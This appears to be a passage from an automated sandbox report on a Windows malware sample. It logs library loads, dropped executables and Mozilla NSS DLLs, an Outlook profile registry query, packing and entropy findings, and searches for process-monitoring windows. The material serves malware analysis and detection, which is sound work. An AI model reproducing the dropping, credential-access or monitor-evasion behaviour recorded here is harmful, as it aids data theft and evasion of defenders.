Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 2545664 > 1048576
Source: file.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x22a400
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.360000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Unpacked PE file: 10.2.BAFIEGIECG.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 12.2.explorti.exe.9b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 13.2.explorti.exe.9b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 14.2.explorti.exe.9b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Unpacked PE file: 15.2.7873c16243.exe.db0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C9B3480
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: random[1].exe.14.dr Static PE information: real checksum: 0x0 should be: 0x2757a8
Source: explorti.exe.10.dr Static PE information: real checksum: 0x1da419 should be: 0x1e8e59
Source: 7873c16243.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x2757a8
Source: BAFIEGIECG.exe.0.dr Static PE information: real checksum: 0x1da419 should be: 0x1e8e59
Source: file.exe Static PE information: real checksum: 0x0 should be: 0x2757a8
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1da419 should be: 0x1e8e59
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: BAFIEGIECG.exe.0.dr Static PE information: section name:
Source: BAFIEGIECG.exe.0.dr Static PE information: section name: .idata
Source: BAFIEGIECG.exe.0.dr Static PE information: section name:
Source: BAFIEGIECG.exe.0.dr Static PE information: section name: gxzeqrwn
Source: BAFIEGIECG.exe.0.dr Static PE information: section name: fgoahxou
Source: BAFIEGIECG.exe.0.dr Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: gxzeqrwn
Source: amadka[1].exe.0.dr Static PE information: section name: fgoahxou
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: explorti.exe.10.dr Static PE information: section name:
Source: explorti.exe.10.dr Static PE information: section name: .idata
Source: explorti.exe.10.dr Static PE information: section name:
Source: explorti.exe.10.dr Static PE information: section name: gxzeqrwn
Source: explorti.exe.10.dr Static PE information: section name: fgoahxou
Source: explorti.exe.10.dr Static PE information: section name: .taggant
Source: random[1].exe.14.dr Static PE information: section name:
Source: random[1].exe.14.dr Static PE information: section name:
Source: random[1].exe.14.dr Static PE information: section name:
Source: random[1].exe.14.dr Static PE information: section name:
Source: random[1].exe.14.dr Static PE information: section name:
Source: 7873c16243.exe.14.dr Static PE information: section name:
Source: 7873c16243.exe.14.dr Static PE information: section name:
Source: 7873c16243.exe.14.dr Static PE information: section name:
Source: 7873c16243.exe.14.dr Static PE information: section name:
Source: 7873c16243.exe.14.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9EB536 push ecx; ret 0_2_6C9EB549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009CD82C push ecx; ret 14_2_009CD83F
Source: file.exe Static PE information: section name: entropy: 7.995439688368047
Source: file.exe Static PE information: section name: entropy: 7.9818075029651885
Source: file.exe Static PE information: section name: entropy: 7.9536686205224
Source: BAFIEGIECG.exe.0.dr Static PE information: section name: entropy: 7.9833117428475395
Source: BAFIEGIECG.exe.0.dr Static PE information: section name: gxzeqrwn entropy: 7.954277381174858
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.9833117428475395
Source: amadka[1].exe.0.dr Static PE information: section name: gxzeqrwn entropy: 7.954277381174858
Source: explorti.exe.10.dr Static PE information: section name: entropy: 7.9833117428475395
Source: explorti.exe.10.dr Static PE information: section name: gxzeqrwn entropy: 7.954277381174858
Source: random[1].exe.14.dr Static PE information: section name: entropy: 7.995439688368047
Source: random[1].exe.14.dr Static PE information: section name: entropy: 7.9818075029651885
Source: random[1].exe.14.dr Static PE information: section name: entropy: 7.9536686205224
Source: 7873c16243.exe.14.dr Static PE information: section name: entropy: 7.995439688368047
Source: 7873c16243.exe.14.dr Static PE information: section name: entropy: 7.9818075029651885
Source: 7873c16243.exe.14.dr Static PE information: section name: entropy: 7.9536686205224
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
